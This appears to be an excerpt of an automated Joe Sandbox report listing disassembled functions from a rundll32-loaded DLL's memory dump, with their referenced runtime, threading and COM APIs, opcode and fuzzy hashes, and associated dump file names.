Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_
String ID:
API String ID: 4267064421-0
Opcode ID: 23e00c799a6dd36087ae92aa4e83884da925524987d5ed586aa509dd0bfb1164
Instruction ID: 729e690d4fb9d0e7ba7dcbad66bd4045d4148ef8a29060e7731cc9b53763ef5d
Opcode Fuzzy Hash: 23e00c799a6dd36087ae92aa4e83884da925524987d5ed586aa509dd0bfb1164
Instruction Fuzzy Hash: C641F712B0965241EB08DA76D4606B96711AF44BE4F88C971DE3D47FCDCE3CE1428340

Function 00007FFDFA90F130 Relevance: 7.6, APIs: 5, Instructions: 120COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA90F1CD
new.LIBCMT ref: 00007FFDFA90F1E0
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90F29B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90F2C5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90F2CB

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_
String ID:
API String ID: 4267064421-0
Opcode ID: 01e93808fd9440d4409535a2870e0c5fb6cd122f775bdeea47524ea2babf1a4c
Instruction ID: 66bf7d3e9287323548a71531d6de037dccf262678691f507d57346e0a0fbf37d
Opcode Fuzzy Hash: 01e93808fd9440d4409535a2870e0c5fb6cd122f775bdeea47524ea2babf1a4c
Instruction Fuzzy Hash: D041F566B0965245FB08DA76D4605B96310AF44FF0F888A71DE3D5BBCDCE7CD2428350

Function 00007FFDFA8D207C Relevance: 7.6, APIs: 5, Instructions: 108COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8D20D5
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8D21A4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8D21E1
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8D21E7

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_
String ID:
API String ID: 4267064421-0
Opcode ID: 2f3caba4425e289876a94413306ba9d4959a61a21f8a81287be09021180a26dc
Instruction ID: 2cee5ec1e35f715dcaccd9524a872f81f332cf4c7f0cbc51b6481edc479fd499
Opcode Fuzzy Hash: 2f3caba4425e289876a94413306ba9d4959a61a21f8a81287be09021180a26dc
Instruction Fuzzy Hash: B0412672B2464685EF28CB25E8607A96750EB587C4F444572DFAD077C9EFBCE145C340

Function 00007FFDFA8F4120 Relevance: 7.6, APIs: 5, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8B4D08: WaitForSingleObjectEx.KERNEL32 ref: 00007FFDFA8B4D62

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFA968BF8), ref: 00007FFDFA8F417C
ReleaseSemaphore.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFA968BF8), ref: 00007FFDFA8F4196
ReleaseSemaphore.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFA968BF8), ref: 00007FFDFA8F41B7

Part of subcall function 00007FFDFA8B4DB0: CreateEventA.KERNEL32 ref: 00007FFDFA8B4DEA
Part of subcall function 00007FFDFA8B4DB0: CloseHandle.KERNEL32 ref: 00007FFDFA8B4E19

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFA968BF8), ref: 00007FFDFA8F41F9
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFA968BF8), ref: 00007FFDFA8F422D

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Event$CloseHandleReleaseSemaphore$CreateObjectSingleWait
String ID:
API String ID: 1436492870-0
Opcode ID: df526144e84990efae223006a84edff3b767429f22f46508a8fe73c342c2743a
Instruction ID: fd5af7cd2e80a6c033ca38c1792da754809e6fdd4b160393cb5d655005b8963f
Opcode Fuzzy Hash: df526144e84990efae223006a84edff3b767429f22f46508a8fe73c342c2743a
Instruction Fuzzy Hash: 9931B921B2964343EF288B25A464A3D6360FB56B90F244275DBFE437D9CF7CE8418740

Function 00007FFDFA8C04AC Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8C0506
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8C058D

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C05C4

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C05CA

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskDeallocateExceptionThrowstd::_$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 766625294-0
Opcode ID: 721ceb0971eb9344b893c475bce6ff025aefa51a6e49732601c07d2a0f0500b4
Instruction ID: 7c565f12c348b8cabbb284787390a3aeef3edabba5de24dfea68eee627b0af6e
Opcode Fuzzy Hash: 721ceb0971eb9344b893c475bce6ff025aefa51a6e49732601c07d2a0f0500b4
Instruction Fuzzy Hash: 2431D562B2869185EB18DB15E4649696374EB48BF4F4A4772EE7C07BCEDF78D1018700

Function 00007FFDFA8CCAEC Relevance: 7.6, APIs: 5, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8CCB46
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8CCBBF

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8CCBF6

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8CCBFC

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskDeallocateExceptionThrowstd::_$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 766625294-0
Opcode ID: 9e46f227dc0ebe9f4319e6ac21f4448a4194d3a367ee4ab0079636fb5ebbacc5
Instruction ID: 66ca89493e172943acaed5f0cf97dcfb592fdd898e7c27085c9f28f2eb8f28b0
Opcode Fuzzy Hash: 9e46f227dc0ebe9f4319e6ac21f4448a4194d3a367ee4ab0079636fb5ebbacc5
Instruction Fuzzy Hash: FB31E3A6B1868185EB28DB52E45496D6364EB44BF0F0A8772DFBC07BCEDE7CE1418700

Function 00007FFDFA8C02D8 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8C032F
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8C038A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C03BE

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C03C4

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$Deallocatestd::_std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 2759354802-0
Opcode ID: 0bf118118367ccf5c23706d8675451ea34dbda50e0dabae2b657350a4d05518d
Instruction ID: 120351b40205cb768addd72b4c534e7ff5a0921816449cf60828169cfdd1bdc4
Opcode Fuzzy Hash: 0bf118118367ccf5c23706d8675451ea34dbda50e0dabae2b657350a4d05518d
Instruction Fuzzy Hash: BC210022B19A8241EB18CB65D424569A764EB44BF0F158B72DFBC1BFCEDF68D1018700

Function 00007FFDFA98FFB0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA98FFD4
CreateThread.KERNEL32 ref: 00007FFDFA990015
GetLastError.KERNEL32 ref: 00007FFDFA990023
CloseHandle.KERNEL32 ref: 00007FFDFA990040
FreeLibrary.KERNEL32 ref: 00007FFDFA99004F

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: fa62c5f9fa01c14f4a68958f3a830b0e375d3e66e2a35388ed19f98543f7ff33
Instruction ID: cba04cd32fa96295925c3472c0a916d88c761db4b5d5e430cc980df0622851e3
Opcode Fuzzy Hash: fa62c5f9fa01c14f4a68958f3a830b0e375d3e66e2a35388ed19f98543f7ff33
Instruction Fuzzy Hash: AB214C26B0974282EF199B62A46097A6390AF88BC4F844575DA6E87BDDDE2CE440C650

Function 00007FFDFA8D5D88 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8D5DDE
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8D5E2F
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8D5E5C

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8D5E62

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$Deallocatestd::_std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 2759354802-0
Opcode ID: cfee4bbf37f9edbabf35d59538ad07b4ee3f8daaa05cb6ea82cae11dc3a65ed4
Instruction ID: a2c55d6daedf33aa68831e6476ef0db8e073be1ca1cceba553049fcbe2de5c94
Opcode Fuzzy Hash: cfee4bbf37f9edbabf35d59538ad07b4ee3f8daaa05cb6ea82cae11dc3a65ed4
Instruction Fuzzy Hash: 1721F232B15A8285EB0CEB62D0645AD6324EB08BE0F588736DF7D07BCDDF68D0608340

Function 00007FFDFA8C03CC Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8C0422
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8C0473
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C04A0

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C04A6

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$Deallocatestd::_std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 2759354802-0
Opcode ID: ec2dc40c33fffabc66afbf5e18213e82dbbae4dce14b0b0566263df7b106de9b
Instruction ID: be509cecbf86d32578e227c57ef554a9f075d17860098ed423d531ddf704236b
Opcode Fuzzy Hash: ec2dc40c33fffabc66afbf5e18213e82dbbae4dce14b0b0566263df7b106de9b
Instruction Fuzzy Hash: 7E21B072B25A4685EB0CDB61E0606AE6374FB48BE0F948636DB7D03BCDDF68D1608340

Function 00007FFDFA8B11FC Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8B123E
std::_Locinfo::_Locinfo.LIBCPMT ref: 00007FFDFA8B1272
_Getctype.LIBCPMT ref: 00007FFDFA8B128A
_Getcvt.LIBCPMT ref: 00007FFDFA8B12A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00007FFDFA8B12CF

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Locinfostd::_$GetctypeGetcvtLocinfo::_Locinfo::~_
String ID:
API String ID: 2826301415-0
Opcode ID: 5641995d7306317838e318066a43292254f91d55b964bffe278e0703190a9409
Instruction ID: 608134de2e92fcbbfb23ae6c475c88001627817b2ad9059de6e72855d10bb113
Opcode Fuzzy Hash: 5641995d7306317838e318066a43292254f91d55b964bffe278e0703190a9409
Instruction Fuzzy Hash: EB218422A18B8582EB24CF24D4107A97770FB94B98F509372DB6C972DAEF78D581C740

Function 00007FFDFA8F46F8 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32 ref: 00007FFDFA8F471D
_com_issue_error.COMSUPP ref: 00007FFDFA8F4729
CoInitializeSecurity.OLE32 ref: 00007FFDFA8F4753
_com_issue_error.COMSUPP ref: 00007FFDFA8F475F
_com_issue_error.COMSUPP ref: 00007FFDFA8F476F

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _com_issue_error$Initialize$Security
String ID:
API String ID: 601672203-0
Opcode ID: 71e2f57c4ad06176b4a5f6e6c297fe6c2ad8f9ea88118bc92160f530134c9719
Instruction ID: 0f3531d57a421310e0edde262150581ebadc641cd8d00d45263e0279b5787d63
Opcode Fuzzy Hash: 71e2f57c4ad06176b4a5f6e6c297fe6c2ad8f9ea88118bc92160f530134c9719
Instruction Fuzzy Hash: D301D621F2838346FB289B71A460B3A6694AF41364F90437DD9B9C72C8DF7DE845C600

Function 00007FFDFA8AC064 Relevance: 7.5, APIs: 5, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC070
GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC07A
LocalAlloc.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC08C
GetSystemDirectoryW.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC09F
LocalFree.KERNEL32(?,?,00000000,00007FFDFA8AB851), ref: 00007FFDFA8AC0B0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
